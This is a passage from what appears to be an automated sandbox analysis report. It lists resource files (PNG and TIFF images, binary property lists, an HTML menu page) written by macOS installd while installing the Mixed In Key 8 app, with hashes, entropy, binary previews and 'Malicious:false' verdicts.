                                                                                                    SHA-512:DE1E02ACA0CD9AB9D5D030ADA46BD3E1DD3143E80CBF74F0BF7F7AE630ADE4320E012D3F1403AD44741809AEAC0E6476F5B31F057B2E10ABADC8D1D073C642CD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: icns...Vic08...S....jP ........ftypjp2 ....jp2 ....jp2h....ihdr..................colr.......appl. ..mntrRGB XYZ ............acspAPPL....appl...........................-appl................................................desc.......odscm...x...lcprt.......8wtpt........rXYZ...0....gXYZ...D....bXYZ...X....rTRC...l....chad...|...,bTRC...l....gTRC...l....desc........Generic RGB Profile............Generic RGB Profile..................................................mluc............skSK...(...xhrHR...(....caES...$....ptBR...&....ukUA...*....frFU...(...<zhTW.......ditIT...(...znbNO...&....koKR........csCZ..."....heIL........deDE...,....huHU...(...JsvSE...&....zhCN.......rjaJP........roRO...$....elGR..."....ptPO...&....nlNL...(....esES...&....thTH...$...6trTR..."...ZfiFI...(...|plPL...,....ruRU..."....arEG...&....enUS...&....daDK.......>.V.a.e.o.b.e.c.n... .R.G.B. .p.r.o.f.i.l.G.e.n.e.r.i...k.i. .R.G.B. .p.r.o.f.i.l.P.e.r.f.i.l. .R.G.B. .g.e.n...r.i.c.P.e.r.f.i.l. .R.G.B. .G.e.n...r.i.c.o...0.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_c3zKwM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 30 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2813
                                                                                                    Entropy (8bit):7.909683961433022
                                                                                                    Encrypted:false
                                                                                                    MD5:21D7C4DD99961496E8F8F52F3D242619
                                                                                                    SHA1:55108EB8E48FAE7AAFE7DCF44FF28DD946396053
                                                                                                    SHA-256:7EC92ED78741EDD37CA1309F0434FFD074424A340C42472B8541552E7F474B74
                                                                                                    SHA-512:F13E6BF6F358894531BFF5884FFCB1C0ADB933011560C9C7014DACC8E3FCC4F766F513B16245BD2D47AFE9E8BA737C5CD9B68DF973D26A431EB44B141E1DA44B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(.....fq.E...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_cNI432
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):85030
                                                                                                    Entropy (8bit):7.946426330164176
                                                                                                    Encrypted:false
                                                                                                    MD5:2AA6E3DEF55FAF02590EC9A5DA3B350B
                                                                                                    SHA1:135A47BC355470CDBE99FEBEE0E9FCAB5B6ABA7A
                                                                                                    SHA-256:12A1DB8E5286C1E54042AE5E407CB8EEE53B522190C01123F2885896E164CFFA
                                                                                                    SHA-512:9963A9DDDD9C21C2A0C629102467E431D8708A418F93AEEA6F06F4D022740EF5E0060622656A999261A014170623CB65936631BAF4FA2050144F035B8150780E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...R.............>...................................T....2016:08:11 00:18:09..?.@.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.Ng@...w?.PhT:%..G.RiT.e6.O.TjU:..{U.VkU..v._.XlV;%..g.A.. ...o.K.n...|.........<..07h%.z.....\T*.{.c`........j.....~...9..G......[T'C..@..P......v..~3'..b..|.+A....z\.....g2...'....o{-......:....G..v5w...y...0.;..[..o.....t...S..2..2...S.............O.E..Os:.9....C...........s|.6/4E.<p...71{.......2.`:.....!....#!.|.%....u..s..0.B...N$x..R....0....Nd..8.....S$3..pd^.Ds..1@p.A-M.t..M.4....$]+O/#.......Gn\5......S....K.t.%D...7G.e4.J....G.k...n.....2..6..q.........{9..+.4....d1...b.q5{,.O..5....W-..GUYmmih....2.... ..m..Phe....}.w.g.B.......M........Y..v.1q.B.R6m..O..!z.05..U3.0.`L$..5.Ee<:-..1..69.b7..7./<uO72...V.N%.<....`u.1.Y1M.m8o.v..........h..4..fr<...x.........tn.xP.MD.........~.....!.q...c.........I/........;...a!....my...ER.)B.|.V...v5..X.....$.he.....,...g....r....V=u.....C.....e..W..V.oo...<C..~/)%M.....Z...{~.5*`..e+..]...|.^......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_dDQ3sR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11307
                                                                                                    Entropy (8bit):6.8240651039705575
                                                                                                    Encrypted:false
                                                                                                    MD5:EE316731D12BDD836FF83E3126D1B1FA
                                                                                                    SHA1:94DE9C0A4DF57CFB828187961F4B9322347D2DF3
                                                                                                    SHA-256:18F1E707DF95B32A1AB0AAC543E39E46FE9BFA73EEE1D41AFEE0EBD272A2AC2C
                                                                                                    SHA-512:332C3240AB10AF0A04848AC1832AC4EF65BF91C791F8C62216A5D3AACA729917B1D230828051D0C742C2249F8689FC9CB0A6B0969728F5961F413D5C710085B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............>.?X$versionX$objectsY$archiverT$top...............#.$.*...2.S.Y.................................................................+.,.-.7.8.9.E.F.G.Q.R.S._.`.a.k.l.m.y.z.{.......................................................................".'.+...2.7.;.>.B.G.K.N.R.W.[.^.b.g.k.n.r.w.{.~....................................................................................... .$.).*./.0.5.6.;.<.A.B.G.H.M.N.S.T.p.s.t.........|.............~................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.8.;U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.2_TtC10MixedInKey32PropertyCheckboxesViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_g4MbeG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 10 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2841
                                                                                                    Entropy (8bit):7.910899373244266
                                                                                                    Encrypted:false
                                                                                                    MD5:1088016EB173212F3BBE06D89F636997
                                                                                                    SHA1:5AA13897E238C86B8DA6F30BCE9FE25555CCA457
                                                                                                    SHA-256:1130C6D18D21AD293AC39F62085D43DF312562BD573CA3ABD62FA80F8FE989BB
                                                                                                    SHA-512:6D487515B505C38DBF850F0ED23B730D62043C73FCC34BA7C97E048BDBFE4FAD682727528BD3E2BCB9A672480ABA6A37375DC8493E89D51F862C3D256BBA3F4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(.....H4.....CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ggTiNq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 18 x 35, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):3708
                                                                                                    Entropy (8bit):7.730834492790864
                                                                                                    Encrypted:false
                                                                                                    MD5:D24DBD3A38FD6660C76874584E6784A8
                                                                                                    SHA1:BDA0CC006DE711AC14D6826C9DC4559D49509A46
                                                                                                    SHA-256:B9A4B5E37C1ED4DD9E1BFD2FA505BE413D8DC2A88D229B0296CF598029FE9495
                                                                                                    SHA-512:80D6783C918BED958B8284160859F76515B0EB874B0D2E0E33477C4026C479A0D917E7A37B6CCD90B839E58E90A13384592FB3053FFB7775513C728070A78676
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......#.............iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_hABUkf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):7872
                                                                                                    Entropy (8bit):6.976097472679615
                                                                                                    Encrypted:false
                                                                                                    MD5:7DEE934A47E778182A8D86FDB17340EF
                                                                                                    SHA1:E336A2CE19EEF81D651F1DA46C1C09255B0048CE
                                                                                                    SHA-256:87BDCE55FC78F5A5BF2B89DEF9CC0427DB16F3BD66E84AF4EF09DA6FAC3002D5
                                                                                                    SHA-512:EFD0E72402C04F6FECCFA43037E7D5DBA5BD38B46C5D38321F159F4F8949A543FB832452FF3286D7C25A43A0865CB91E62CD29C86B4AED51FFCDCF9F521291A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*.....?.@.$....BaP.d6...DbQ8.2....cQ..v=..E..9$.M'.H...d.]..K.S9.jc5.NgR...}?.M........Rh.J...E}S.T.5:...3`.)eF.[..'.J..9PxAA.$...c.R..J...8.4`.8+.sd.Y.u.<..8]ATpW..#.iU....N....*T.EP3..F..x-.....`....sTN.#..........8uC[..Q..*......j..}...+AA..^....:.<8.B..{.@P^U'... `.....T...;J+....r...#z.......:h...(.R.. .J..*.j.i@).Z....f.*.../ .....0.*......>k:.. .b..)1".. ..N...(.....H...)?..q,s...:.-#.;,...).$F.P..I.@.....Z.....p..4l}G.....H(,.1....9.+....Lo.M..D......(....O.e.@..b.Z...<...(KF..).H#.z..*..?C...4...hx..u.6O*..OTJg.....uaY#Uj..$...}J.!.F..Z....k...J..b.......z."..(z..(+?h....4*.+e............j..t_...~.................N.............................(......................................................... .................................................(.............w.....................................(...........1...........=...........R...........S...........s.....H.......*................................collection-icon-selected@2x.png.tiffutil v310....HLino....mntrRGB XYZ
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_hxuAus
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):869
                                                                                                    Entropy (8bit):7.658809722807515
                                                                                                    Encrypted:false
                                                                                                    MD5:4C804C93213D0FBC2FCA2D7590B63EAE
                                                                                                    SHA1:9507D931B84229F9673975F037B133CFC54F441A
                                                                                                    SHA-256:50C5EF8B2A85900DE0959F2527C3F84CA1EA068DBA98CB44ADF3C3DB5417DB18
                                                                                                    SHA-512:D3A4209DB3AD64778A4D4F82609452777F6A0AFB475B820B256FA47B83448B4673123C711172B0C7D8ACC51E6EFB854D34E659B3B22AB3B5094F736E01D35864
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[.U.0.5y..6.m...f...............&H:Ar.4L.n.lPx.$.lKI.C....Kl.[..-..m[A,.R.tf<..Bi.tg<....@.d.t..!..n..I.j..*..-......}?L....M...l....x]|P....TL+..{..b.J........JL..YP.LFlf.....J...P.........P....jI.&T...&....4).....k<..>...x...6.......m.@...p...$...~S..I.M......n........9A4.aZ.K2..e.yT.....`'B%.].`...~........,..e..Iu...qy.0WpO...5..\.:4.&.. .yv;....o.....>..C....XjH.\..;.....~Q.tM...{.1.^...&...D......E.H..Od.....p.9...-c..=`..5....dK..g.p7.{.f.7..Qr..r.`a.......K6..`1........q...K..^........J.>......0=.5.z....a......a..;0...ab="{.FzVA2p..tm...}q......^.....1..b...SO]/...Z.i.G.%.b.@...d...M.._6.+(..6>.......l...Nu........A..rIa...........^.g.}..|...s.[.x...m.sA_.....t.a...F.....Y.U.L.]J8G.....L.{.I}.+..PW..G..8qu..*..*.t9.......VCl9(..b.......N.....g.........~.t&Q.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ibCk1L
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):5943
                                                                                                    Entropy (8bit):6.6000972810989005
                                                                                                    Encrypted:false
                                                                                                    MD5:62A21700E46E492C89AB2FCC727766EE
                                                                                                    SHA1:B625BDB5BF9D4B4AFA9DEB1EEBCD9027C71540BC
                                                                                                    SHA-256:5DB5E30C764C58FCB74EE6DD415333D2AF39D43EE8DFF348B8EA74E259814A78
                                                                                                    SHA-512:6D20BDDB1A48688F9F98AD1DAF5C18D8E2869547C0599119B342454D11651E5A092A536449A13AADE7E88F69F2CC081EF2A213B8CE8BEC34BBC2E77DD6770784
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............8.9X$versionX$objectsY$archiverT$top.......x.......#.$.*...2.:.B.`.l.o.s.....................................................................................&.3.6.<.B.H.Q.V.X.[.\.e.k.p.u.{........................................./.8.>.P.......D..... .!.".#.$.%.&.'.(.).*.+.,.-.../.2.5U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....Y.W.T.v...v.u.w.X.. ...!."[NSClassName...._.._TtC10MixedInKey28ArtworkPopoverViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8.....J.M.O....;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel............C.D.E.F.G.H.I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.R.V.R.[.\.].Q.__..NSPlaceholderImageYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSv
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ipyANP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):1452
                                                                                                    Entropy (8bit):7.159486487333368
                                                                                                    Encrypted:false
                                                                                                    MD5:C9A2084C418E2829780356FB78448362
                                                                                                    SHA1:411674D48239D76928B93F1AA1CAEC3873C699F6
                                                                                                    SHA-256:D0D61DD6693AE4CAC74F81C7F02178D677D67FBF834401455F15D8A8D81A15BB
                                                                                                    SHA-512:E35A250E635449333689E02887714A17D49FD9D01CE265C3E732610E7951A9634931C63DCDF8C6DA9FC37F65C98EFAE483C9BA1F99FE709946C0DC9DB7BB4793
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...(...(........m....sRGB.........pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 5.4.1</xmp:CreatorTool>. <xmp:ModifyDate>2016-06-28T14:28:49</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.........IDATX....N.@...Q. ..m..Jy.^ 5........<I..i.x.h.C.....E.,.....`....}...{.=.{<3.b..m6.%....,.....n..*....vj......]M>......}..#.k..`....... .5.?.9....]......>...8O...s......R8..r..7......(r..~8.......g....,..!.o....6g.(.T..u..........b._<..."..>t...[.......'.4!.3w.........)v...A...V...G..&...v
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_jHKqvd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 5 x 40, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):2845
                                                                                                    Entropy (8bit):7.908364260501814
                                                                                                    Encrypted:false
                                                                                                    MD5:E909F95EBF82FDF40D95E5C5B732B3A7
                                                                                                    SHA1:7DA7FD7DB57D3200BD4AE30B11B020DFDF89318C
                                                                                                    SHA-256:F4A59C69FC547BC9AB11CE89759398BDC5A56CE72973CA0D0B746A4569BBB916
                                                                                                    SHA-512:3E6A2C9806D97B1162DBBAAD515FE44997635A25F941D5618BCAE0A484929D268894699900A9CDB16CD8BE743B5D3209EC37EC09CCA22C908CEC93300110469D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......(......?.Z...CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e..........;s.....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K..B...|A6..<..s%Y2.$...4.......QV.q..6.....d....Q.Y.Y....;P..#.......#...|.e.ti...7(.3..l.0..]"...l.2E...Ay...J.,N....24O.8.Y........g..vtd3}..........q.|&'3#.+Z...;......L.......,...._._..z.;.z...e...A..o.o..l.........fK,..e......... ..@..Y.a..%E".r........x...~.......a.y.......)H.J.%LYQy...R13;...0Y..bt...8+.Yy.....b..=*..2.(.m../..3EL...:...f. ./s....#./...7.....`hd...GW..}.$F.......2.(......\.~...d.....`......oB.........-................ ......R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. .......@(.....dH.I.U.F..*....P..#t...].z....4.........aM......;..G...dx).......p5|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,...l..c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w.....M..x5........%.||.......?..C ...6.oB.AD.@
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_jHfV81
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 90 x 90, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):1110
                                                                                                    Entropy (8bit):7.352757549179103
                                                                                                    Encrypted:false
                                                                                                    MD5:2DD8D2CC77B426993DE3BBA0E11FF1CE
                                                                                                    SHA1:4033998BE97765CD933B1ED16BE3F8B058410BCF
                                                                                                    SHA-256:07B934F63520ACE8ED23B68CE2D3982583D8C8297A74771CC65A84FDABC91BF7
                                                                                                    SHA-512:09F50D8740D33242DBC1B0D6559732D9D710D233B1BA9E28A201B08AA70ABF5D7B26E4BC7F0A0E20291443021FDBB1E03CCD7F72EC361B6042354781C9C53C20
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...Z...Z.....8.A.....bKGD.......C......pHYs...H...H.F.k>....vpAg...Z...Z...#F...2IDATx...Ir.a...O..........BH.x....'..B....,..5.PU.z.\...z+G+G...).....".0..sX...2.Xu.....O....X.....X..@....B...Bv..#..Z...Md.B.......h!;z...P.-dG......Q.-dGo92.A...[..y.Bv...a.Z..8.a.Z...&.d....=.d.D.....Fi..>.......gR!.rr..O...D....b#.2.>........5d0C...-d0A....d....+..P.-dWJ...Z..T C...]1 ....]1"....]q ....]q".$.D~Q+2@2L....AdH....M!G{....5.......B...^...~oxM.E...@...........I.l.7..*..B..[...kR!..-G..5....V#C......W.F..5iG..~......kR!...!...T..{.....=....skR:...5)0..I...I....{.E.N.I.<2.~MJ/...kRz...]...7.A.V.I..?.{....[..Kdh...."Ck.....Z.&.......A C.kR.....I..rCkR...lZ...A"...sM.,....j[..B.....82..&e..p.5)B.........u.].p.5)B..........r.5)......".A....$.Z."...`M....sM.,....=..d..co....5)Bv...?....{.....Bv......T...{d.@/..l..D.+...n>.J..X.....G.*h!;z....Z...rd(.............!.6....vdX.........Bv.....!{zc.........O.....%tEXtcreate-date.2016-07-15T14:54:08+00:00..J+...%tEXtmodify-date.2016-07-
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_jZJkej
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):13150
                                                                                                    Entropy (8bit):6.710800521321472
                                                                                                    Encrypted:false
                                                                                                    MD5:3019DBDF7C21BBD59181F7C270780E7F
                                                                                                    SHA1:4F3C098AFFEC0A9AD5AF2D22D2D191AF06F68652
                                                                                                    SHA-256:E4328BFB7C74A3773FE1D77ECCE52F23E0FB5A897381E33A41985BEDFFF4176D
                                                                                                    SHA-512:352624BEA2E1559279E48CF9A95FB3055A3654E7A74E9EB0FC5AE41A30B20832849C719B99CDD8B51059F836D9A394A8C7E5CC7EE86D6D2080B82321ADE0B41A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.>.D.s............................................................. .#.-.0.3.4.8.<.E.I.J.T.X.b.e.o.r.s.y.................................................................#.)...3.9.;.=.>.?.@.C.D.I.J.O.P.T._.`.a.b.f.m.n.o...........e.....5.f.......%......................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....y.w.t...........x.. ...!."[NSClassName...._.-_TtC10MixedInKey27FileCopyingWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.=..4.5.6.7.8.9.:.;.<.../.:.J.L.g.i.l.q."..?.@...A.B.CXNSSourceWNSLabel...-......E.F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.`.c.d.e.e.f.g.h.i.c.g.k.c.l.^.m.d.c.o.p
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_lHJe2G
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:HTML document text
                                                                                                    Size (bytes):1546
                                                                                                    Entropy (8bit):5.015020480535862
                                                                                                    Encrypted:false
                                                                                                    MD5:157F6800B8132247A46AFF4391D65B27
                                                                                                    SHA1:BDE682B657A278B12BC8B4C44E695435B9222F44
                                                                                                    SHA-256:99542796EDE3968AFA0FE944DE86887558A0C0AE992A840DB570B602715E5AB0
                                                                                                    SHA-512:90366B01338543E67F364E5FD80809ADDCD2E0E55F17D67BE06A2E1AF830709E1417B120E122EE6D2DEAADF4E20632E37FA8DE05E11B4ADFF7FEFEBD6E6EF5FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<title></title>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<link rel="stylesheet" href="top.css" type="text/css" media="screen, print" charset="utf-8">..<script type="text/javascript" src="top.js" charset="utf-8"></script>.</head>.<body>..<div id="logo-left" onclick="selectTab('browse'); window.location='mik://browse'"></div>..<div id="menu-left">...<a id="browse" class="first tab selected" onclick="selectTab('browse');" href="mik://browse" title="Switch to the browse panel">....<span class="contents">Collection</span>...</a>...<a id="tagedit" class="tab" onclick="selectTab('tagedit');" href="mik://tagedit" title="Edit file tags">....<span class="contents">Tags</span>...</a>...<a id="personalize" class="tab" onclick="selectTab('preferences');" href="mik://personalize" title="Personalize your settings">....<span class="contents">Settings</span>...</a>..</
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_lcNRJN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):7816
